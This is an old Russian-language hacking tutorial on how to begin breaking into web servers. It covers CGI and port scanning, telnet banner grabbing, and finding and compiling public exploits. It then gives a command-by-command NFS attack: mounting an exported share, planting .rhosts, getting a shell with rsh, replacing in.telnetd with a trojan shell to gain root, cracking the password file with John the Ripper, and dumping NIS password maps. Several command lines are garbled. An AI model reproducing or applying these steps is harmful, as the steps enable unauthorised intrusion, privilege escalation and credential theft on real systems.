|
C чего же всё таки начинать взлом
сервера (сайта, странички и т.д.)
Итак, приступим! Первое с
чего стоит начать это просканировать
хост на стандартные CGi сценарии с
помощью специальных сканеров
которых слава богу сейчас
предостаточно. Ну и что бы вы не
потерялись в выборе могу
посоветовать лучший (ИМХО) на
сегодняшний день-это DCS-D@mned Cgi Scanner
предоставленный нам хак-группой D@mnedr,
его можно скачать с йх официального
сайта ( http://www.cc.f2s.com, еще правда есть
сканер от группы Void (http://www.void.ru/)
Но он немного уступает DCS по скорости
сканирования. Ок, дальше, сканнер
нашел уязвимый скрипт и вы спросите
что же делать дальше???, а дальше вам
надо найти то как использовать этот
эксплоит, я дам вам несколько ссылок
где можно найти описание этих ошибок:
http://qwerty.nanko.ru/
(наиболее полный но на Английском)
http://www.void.ru/
http://www.hack-crack.com/
или вы можете просто зайти
на один из следующих сайтов и просто
ввести уязвимый скрипт в строке
поиска:
http://www.packetstorm.securify.com/
http://www.securityfocus.com/
http://www.rootshell.com/
Второе и пожалуй главное -
это сканирование портов, для
сканирования можно использовать
любой сканнер портов(какой - на ваш
выбор их сейчас везде полно), но опять
же хотел бы обратить ваше внимание на
сканнер Nscan который можно скачать тут
http://www.nscan.hypermart.net/,
этот сканер обладает просто
потрясающей скоростью сканирования
и довольно просто в управлении(правда
на сайте лежит Shareware версия которая
будет работать только 30 дней)
После того как сканер нашел
открытые порты вам надо
приконнектиться к каждому и
посмотреть какая версия
программного обеспечения
установлена на нём, делается это с
помощью клиента TELNET который есть
даже в Вынь95 (98,2000), в командной строке
TELNET вы пишете:
telnet>open www.target.com
и смотрите версию софта например:
WU-FTPD 2.6.0(1) Sendmail QPOP IMAP и тд. После того
как вы посмотрели версию вы должны
найти эксплоит под эту версию, идете
опять же на:
http://www.packetstorm.securify.com/
http://www.securityfocus.com/
http://www.technotronic.com/
и вводите в строке поиска название
программы и его версию.
После того как вы скачали
эксплоит его как правило надо
скомпилировать - то есть привести к
рабочему состоянию (как правило) так
как большинство серверов в сети
висит на *NIX то есть ЮНИКС ЛИНУКС
ИРИКс и тд, то и компилировать его
надо под этими системами. Если у вас
нет установленного ЮНИКСА, то вам в
любом случае (если хотите чего ни
будь ломать нужен Юникс Шелл, то есть
оболочка Юникс). Бесплатно её можно
получить на http://www.nether.net/ и тому
подобных серверах (введите на любом
поисковике UNIX+SHELL+FREE)
Когда шелл получен и
эксплоит скачен то можно приступать
к компилированию, обычно эксплоит (в
большинстве случаев) это программа
на языке С, для компиляции будем
использовать компилятор GCC, итак в
командной строке оболочки пишем:
gcc -o exploit exploit.c и нижимаем Enter.
Хочу так же заметить что программы в
Юникс подобный системах запускаются
с "./"+имя программы, в нашем
случае эксплоит будет запускаться:
>./exploit
Третье, еще один довольно
популярный взлом системы это
проверка на расшаренные папки, в
Юникс то можно проверить с помощью
утилиты showmount, итак из оболочки
запускаем showmount:
>showmount -e www.target.com
и видим
/user/ Everyone
или что-то другое но если
есть Everyone то значит папка открыта на
монтирование для всех
дальше пишем
>mount -t nfs target.remote.com:/user /mnt
потом переходми в каталог cd /mnt/home
и устанавливаем .rhosts
>echo www.target.com user/.rhosts
дальше делаем следующее:
>cat /etc/passwd
user::257:20::/: -смотрим пользователя и
создаем такогоже у нас(если возможно)
> su - user
! Становимся им$ rsh target.remote.com /bin/csh -i
Warning! No access to terminal, job control disabled!
! И заходим на удаленную
машину
% id
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)
% ls -ldg /usr/etc
! Каталог доступен на запись
drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc
% grep telnet /etc/inetd.conf
telnet stream nowait root /usr/etc/in.telnetd
in.telnetd
! Нашли программу, которая
запустится
!под root"ом из нашего
каталога
% cd /usr/etc
% mv in.telnetd in.telnetd1
! создаем троянского коня
% cat in.telnetd
>!/bin/sh
exec /bin/csh -i
% chmod 755 in.telnetd
! и запускаем его
% telnet 127.1
Connecting 127.1.
Warning! No access to terminal, job control disabled!
> chown user /etc;
! Делаем /etc своим
: command not found
> exit;
: command not found
Connection closed by foreign host.
> cd /etc
После того как у нас есть
файл с паролями вы берете
расшифровщик паролей Юникс - John The Ripper
запускаете его и ждете пока
расшифруются пароли потом из шелла
коннектитесь на 23 порт и вводите
логин с паролем и все вы в системе!
И последнее на что я бы хотел
обратить внимание в этой статье это
проверка NIS сервера. Из облочки
запускаем
>rpcinfo -p www.target.com | grep bind и если видим
что-то типа
120000 2 udp 2493 ypbind
То пробуем сдлать следующее:
>ypx -o target.passwd -g target.remote.com
Берём файл с паролями и
запускаем подборщик.
На этом все!
|
|